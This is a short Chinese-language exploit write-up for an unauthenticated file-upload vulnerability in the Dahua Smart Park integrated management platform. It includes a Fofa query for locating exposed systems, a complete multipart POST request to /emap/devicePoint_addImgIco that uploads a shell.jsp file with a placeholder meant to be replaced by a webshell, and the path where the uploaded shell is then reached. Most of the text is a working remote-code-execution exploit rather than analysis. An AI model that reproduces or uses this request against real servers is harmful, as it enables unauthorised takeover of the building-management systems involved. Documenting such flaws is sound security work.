大华智慧园区综合管理平台文件上传漏洞
- 漏洞描述
- 漏洞危害
- Fofa检索
- 漏洞复现
- 1. 构造poc
- 2. 复现
- 3. 访问shell地址
漏洞描述
大华智慧园区综合管理平台是一个基于智能物联技术的园区安防、办公、运营的数字化解决方案。 大华智慧园区综合管理平台(截至 20230713)版本中存在文件上传漏洞。未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。
漏洞危害
未经授权的攻击者可通过上传jsp的webshell造成rce,获取服务器权限
Fofa检索
app=“dahua-智慧园区综合管理平台”
漏洞复现
1. 构造poc
POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Content-Type: multipart/form-data; boundary=---------------------------23866052015499226143339905740
Content-Length: 1176-----------------------------23866052015499226143339905740
Content-Disposition: form-data; name="upload"; filename="shell.jsp"
Content-Type: application/octet-stream
Content-Transfer-Encoding: binary123
-----------------------------23866052015499226143339905740--
2. 复现
123可修改为webshell
3. 访问shell地址
http://127.0.0.1/upload/emap/society_new/ico_res_**********.jsp